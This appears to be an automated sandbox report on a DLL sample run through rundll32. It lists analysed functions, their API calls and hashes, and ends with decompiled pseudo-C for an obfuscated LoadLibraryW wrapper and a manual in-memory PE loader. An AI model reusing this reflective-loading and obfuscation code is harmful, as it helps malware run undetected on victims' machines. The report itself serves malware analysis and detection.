Opcode ID: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
Instruction ID: b3e5ac37a67a2c34724f7244494befea3428c85a23c18ad1ae006fcf60cdee60
Opcode Fuzzy Hash: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
Instruction Fuzzy Hash: C901ED76500218ABDB10DF688D85FAF77ACEB49714F51082AFA01E3141DB74ED0487A8

Uniqueness

Uniqueness Score: -1.00%

Function 10027E7D, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(00000000), ref: 10027E8D
GetTopWindow.USER32(00000000), ref: 10027ECC
GetWindow.USER32(00000000,00000002), ref: 10027EEA

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
Instruction ID: 7c1aa0b4fd0438a3880c8a8454d512b9e221987d8156c76486bb18807498cd50
Opcode Fuzzy Hash: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
Instruction Fuzzy Hash: 8101D33640062ABBDF139FA1AD05E9F3B6AFF492A0F424054FE1851060D736C961EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10027839, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 10027846
GetTopWindow.USER32(00000000), ref: 10027859

Part of subcall function 10027839: GetWindow.USER32(00000000,00000002), ref: 100278A0

GetTopWindow.USER32(?), ref: 10027889

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
Instruction ID: f10d52d962ac960512d7384eec108a680d17f64428226a36a785d2fcb99e30ea
Opcode Fuzzy Hash: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
Instruction Fuzzy Hash: F301A23618166ABBCB229F51AC08E8F3A99FF417E0F814021FD0C91111DF31D911D6E1

Uniqueness

Uniqueness Score: -1.00%

Function 1003B5D6, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 1003B5FC

Part of subcall function 1003B421: __fltout2.LIBCMT ref: 1003B44D

__cftog_l.LIBCMT ref: 1003B622
__cftoe_l.LIBCMT ref: 1003B654

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 1693f95a625ffde70028128af171decd196e1ba2c6c978d497889c3db2691634
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 85117E3680054ABFCF139E80CC028EE3F62FB09299F548415FF1958032C736D9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 1002A257, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
Instruction ID: f3c4c51c49c486de2effa8659e681593a38c79611994fd5387b39b2d60b42ad5
Opcode Fuzzy Hash: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
Instruction Fuzzy Hash: B5F0C237200316BBD7019FAD9DC4A6B77ADEF866A17524038FE09D3210DE71DD448AB4

Uniqueness

Uniqueness Score: -1.00%

Function 10001310, Relevance: 6.0, APIs: 4, Instructions: 41networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1000132B
inet_addr.WS2_32(?), ref: 10001340
htons.WS2_32(?), ref: 1000134E
sendto.WS2_32(?,?,?,00000000,?,00000010), ref: 1000136F

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _memsethtonsinet_addrsendto
String ID:
API String ID: 1158618643-0
Opcode ID: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
Instruction ID: 60f6b611a07b9dfdfd37c1fffb937be7e3926c5419f3fbf29161148c0f489d21
Opcode Fuzzy Hash: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
Instruction Fuzzy Hash: 7A015E75900208ABDB00DFA4C986BBF77B8FF48700F504459F90597281E770AA10DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 100337CF, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 100337DB

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 100337F2
__amsg_exit.LIBCMT ref: 10033800
__lock.LIBCMT ref: 10033810

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
Instruction ID: dae39449bd8c003bde3e62b30ea038717af1cc855304bc2085dea34c93cae8e5
Opcode Fuzzy Hash: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
Instruction Fuzzy Hash: 72F06D7E909700AFE362DB74844674A37E0EF00762F118619B4419F3A1CF34B900CA91

Uniqueness

Uniqueness Score: -1.00%

Function 1002173A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
PathFindExtensionA.SHLWAPI(?), ref: 10021778

Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669

Strings

%s%s.dll, xrefs: 10021781

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
Instruction ID: cb1c0cb3582a3260588f521687d4e0582820240ed98e8e3d3c47ebba61cd8817
Opcode Fuzzy Hash: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
Instruction Fuzzy Hash: DA01D1759002289FDB10DB28DD45AEF77FCEB85700F4104A6E505E7150EA70AE04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1003785E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 10030483: __getptd.LIBCMT ref: 10030489
Part of subcall function 10030483: __getptd.LIBCMT ref: 10030499

__getptd.LIBCMT ref: 1003786D

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 1003787B

Strings

csm, xrefs: 10037889

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
Instruction ID: 9bdde97464bd0678537997cb56ba83c365607814a506e3d314dec82bc4d239b5
Opcode Fuzzy Hash: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
Instruction Fuzzy Hash: 5C014B38841245CECB36CFA0D8446AEB7F6FF08253F51442EE0495EAA1DF30EA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1002A6AB, Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
String ID:
API String ID: 3253506028-0
Opcode ID: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
Instruction ID: 3062035623b9543bfb964b4a27d18fc4dd6f5ea10993a44c93a1de297aa0e807
Opcode Fuzzy Hash: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
Instruction Fuzzy Hash: 48F09672900355AFEB009F68DCCCB09B7AAFBD6261FDB0017F14486122DF3499C5CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002AC8F, Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002AC9D
TlsGetValue.KERNEL32(100863C0,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACB1
LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACC7
LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACD2

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
Instruction ID: 611a8f73b53b00c56169e9f5a31810a1fff77d91dc8bf1d27f242dc0fd10bd82
Opcode Fuzzy Hash: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
Instruction Fuzzy Hash: 42F054362005149FD3108F68DDC8C06B7ADFB8A2613664425E805D3221DA30F849EB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6800 Parent PID: 6764 rundll32.exeCOMMON

Executed Functions

Function 036652B9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E036652B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t47;
				struct HINSTANCE__* _t59;
				signed int _t61;
				signed int _t62;
				WCHAR* _t68;

				_push(_a12);
				_t68 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0367FE29(_t47);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x68392e;
				_v16 = 0xf5950b;
				_v16 = _v16 ^ 0xb3325752;
				_v16 = _v16 ^ 0xe58473b2;
				_v16 = _v16 ^ 0x56462a2c;
				_v8 = 0x3988bb;
				_t61 = 0x3a;
				_v8 = _v8 / _t61;
				_v8 = _v8 + 0xf338;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x0035ea14;
				_v12 = 0xe53120;
				_v12 = _v12 ^ 0xa236e8c8;
				_t62 = 0x62;
				_v12 = _v12 / _t62;
				_v12 = _v12 ^ 0x01ab7b97;
				_v20 = 0x973198;
				_v20 = _v20 * 0x60;
				_v20 = _v20 ^ 0x38bce55b;
				E0366EB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
				_t59 = LoadLibraryW(_t68); // executed
				return _t59;
			}

0x036652c0
0x036652c3
0x036652c5
0x036652c8
0x036652cc
0x036652cd
0x036652d2
0x036652d9
0x036652e2
0x036652e9
0x036652f0
0x036652f7
0x036652fe
0x0366530a
0x0366530f
0x03665314
0x0366531b
0x0366531f
0x03665326
0x0366532d
0x03665337
0x0366533f
0x03665342
0x03665349
0x03665360
0x03665363
0x03665376
0x0366537f
0x03665385

APIs

LoadLibraryW.KERNEL32 ref: 0366537F

Strings

,*FV, xrefs: 036652F7
.9h, xrefs: 036652D9
1, xrefs: 03665326

Memory Dump Source

Source File: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Offset: 03660000, based on PE: true

Associated: 00000005.00000002.424823283.0000000003660000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.424848934.0000000003686000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3660000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 1$,*FV$.9h
API String ID: 1029625771-1870595533
Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction ID: 445d76aeffa6418ba6e07782575acef4c8bf3c5fa4328e532c9cd7fd8371ec3a
Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction Fuzzy Hash: E32156B9D01208FBDF08DFA8D94A9EEBBB5FB40304F108198E815A7250D3B55B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 10002D40, Relevance: 6.3, APIs: 4, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 36%

			E10002D40(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t181;
				void* _t192;
				void* _t199;
				void* _t203;
				void* _t223;
				intOrPtr _t278;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E100024A0(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						if(E100024A0(_v100, _a8, _v16[0x1e] + 0xf8) != 0) {
							_v80 = _a4 + _v16[0x1e];
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										 *0x10047250( &_v68); // executed
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _v64 - 0x00000001 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t181 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t181;
											if(_v24 != 0) {
												L26:
												_v72 =  *0x10047240( *0x10047234(8, 0x34));
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E100024A0(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t192 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t192;
														E10002320(_v8, _v16,  *(_v80 + 0x54));
														 *_v72 = _v8 + _v16[0x1e];
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t199 = E100024D0(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t199 != 0) {
															_t278 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t278;
															if(_t278 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E100029C0(_v100, _v72, _v76);
															}
															if(E10002AB0(_v100, _v72) != 0) {
																_t203 = E100027C0(_v100, _v72); // executed
																if(_t203 != 0) {
																	if(E10002940(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_v92 = _v96( *0x100870fc,  *0x10087100,  *0x10087104);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		 *0x10047228(0x45a);
																		L50:
																		E10003310(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												 *0x10047238(_v24, 0, 0x8000);
												 *0x10047228(0xe);
												return 0;
											}
											_t223 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t223;
											if(_v24 != 0) {
												goto L26;
											}
											 *0x10047228(0xe);
											return 0;
										}
										 *0x10047228(0xc1);
										return 0;
									}
									 *0x10047228(0xc1);
									return 0;
								}
								 *0x10047228(0xc1);
								return 0;
							}
							 *0x10047228(0xc1);
							return 0;
						}
						return 0;
					}
					 *0x10047228(0xc1);
					return 0;
				}
				return 0;
			}

0x10002d46
0x10002d49
0x10002d50
0x10002d67
0x10002d73
0x10002d81
0x10002db0
0x10002dc2
0x10002dce
0x10002def
0x10002e0c
0x10002e2e
0x10002e37
0x10002e3a
0x10002e55
0x10002e68
0x10002e84
0x10002e6a
0x10002e73
0x10002e73
0x10002e8d
0x10002e92
0x10002e92
0x10002e49
0x10002e52
0x10002e52
0x10002e9b
0x10002eb8
0x10002ec1
0x10002ed2
0x10002ef8
0x10002efe
0x10002f05
0x10002f32
0x10002f43
0x10002f4a
0x10002f72
0x10002f84
0x10002f8b
0x10002f94
0x10002f9d
0x10002fa6
0x10002faf
0x10002fb8
0x10002fd0
0x10002fee
0x10002ff4
0x10003006
0x1000301a
0x10003024
0x1000303a
0x10003041
0x10003058
0x1000305b
0x1000305e
0x1000307b
0x10003060
0x10003073
0x10003073
0x10003090
0x100030a3
0x100030aa
0x100030c4
0x100030d6
0x10003140
0x10003147
0x00000000
0x10003147
0x100030df
0x10003138
0x1000313b
0x00000000
0x1000313b
0x100030ec
0x10003106
0x1000310d
0x10003121
0x00000000
0x10003121
0x10003114
0x1000314c
0x10003153
0x00000000
0x10003158
0x00000000
0x100030c6
0x00000000
0x100030ac
0x00000000
0x10003092
0x00000000
0x10003043
0x00000000
0x10002fd2
0x10002f57
0x10002f5f
0x00000000
0x10002f65
0x10002f14
0x10002f1a
0x10002f21
0x00000000
0x00000000
0x10002f25
0x00000000
0x10002f2b
0x10002ed9
0x00000000
0x10002edf
0x10002e13
0x00000000
0x10002e19
0x10002df6
0x00000000
0x10002dfc
0x10002dd5
0x00000000
0x10002ddb
0x00000000
0x10002db2
0x10002d88
0x00000000
0x10002d8e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.425480374.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.425473612.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 122cb37b0b289274c351768ce399d3c8904b2a50bbd0f0c9b0cc6582413b1c49
Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
Opcode Fuzzy Hash: 122cb37b0b289274c351768ce399d3c8904b2a50bbd0f0c9b0cc6582413b1c49
